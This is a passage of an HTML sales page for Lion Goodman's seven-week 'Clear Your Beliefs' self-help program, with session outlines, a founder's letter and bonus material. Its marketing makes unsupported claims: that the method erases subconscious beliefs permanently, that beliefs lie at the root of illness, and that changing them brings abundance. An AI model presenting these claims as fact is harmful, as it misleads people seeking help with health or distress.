happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and 